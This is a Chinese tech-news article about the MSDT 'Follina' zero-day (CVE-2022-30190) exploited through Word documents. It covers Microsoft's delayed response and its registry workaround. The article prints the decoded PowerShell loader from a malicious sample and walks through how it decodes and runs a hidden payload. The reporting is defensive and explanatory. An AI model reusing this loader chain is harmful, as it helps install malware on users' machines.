整理 | 郑丽媛

出品 | CSDN（ID：CSDNnews）

所有 Windows 用户请注意：有一个高危零日漏洞已存在至少 7 周，有相关证据表明该漏洞已被黑客利用，借此在用户设备上“悄无声息”地安装恶意程序！

起初微软不以为意

根据一位 Shadow Chaser Group 研究人员在推特上透露的消息表示，该漏洞存在于 Microsoft Support Diagnostic Tool（即微软支持诊断工具，以下简称 MSDT），且早在 4 月 12 日就报告给微软了，甚至为了证明其严重性，还附带了该漏洞已被黑客利用进行攻击的证明。

但当时的微软并没有将此视作安全漏洞，因为其安全响应中心团队认为，MSDT 在执行有效负载之前需要密码。可上周五，在研究员 Kevin Beaumont 发现上传到 VirusTotal 的 Word 文档利用了某种未知的攻击媒介时，该漏洞再次露出马脚。

据 Kevin Beaumont 分析，该文档是通过 Word 从远程 Web 服务器检索 HTML 文件，随后使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。

这个过程听起来似乎有些不可能，但 Kevin Beaumont 解释道，当文档中的命令被解码时，它们会转换为：

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Huntress 安全公司的研究员 John Hammond 对该脚本进行了解析：

启动隐藏窗口：
1.如果 msdt.exe 正在运行，则终止它
2.循环遍历 RAR 中的文件，查找编码 CAB 文件的 Base64 字符串
（1）将此 Base64 编码的 CAB 文件存储为 1.t
（2）解码 Base64 编码的 CAB 文件保存为 1.c 将 1.c CAB
（3）文件展开到当前目录中，最后：
（4）执行 rgb.exe（可能压缩在 1.c CAB 文件中）

7 周后的“幡然醒悟”

于是将近 7 周过后，本周一微软终于“醒悟”了：将该漏洞标识为 CVE-2022-30190，并将其形容为“关键”漏洞，且目前所有受支持的 Windows 版本都会受到影响。

当从调用应用程序（如 Word）使用 URL 协议调用 MSDT 时，存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可使用调用应用程序的权限运行任意代码。随后，攻击者可在权限允许范围内安装程序，查看、更改或删除数据，或创建新帐户。

相较于介绍漏洞、发布补丁并督促用户更新的一般流程不同，本次微软发布该漏洞的公告时，并未推出任何补丁，解决方法也只是建议用户按照以下步骤禁止 MSDT URL 协议：

1.以管理员身份运行命令提示符。

2.若要备份注册表项，请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename” 。

3.执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”。

鉴于目前微软尚未推出该漏洞的对应补丁，而该漏洞又属于“高危”，建议所有经常使用 Microsoft Office 的用户在微软推出进一步防范措施前，应确保完全关闭 MSDT URL 协议，并对从互联网上下载的所有文档进行必要的审查。

参考链接：

• https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/

• https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/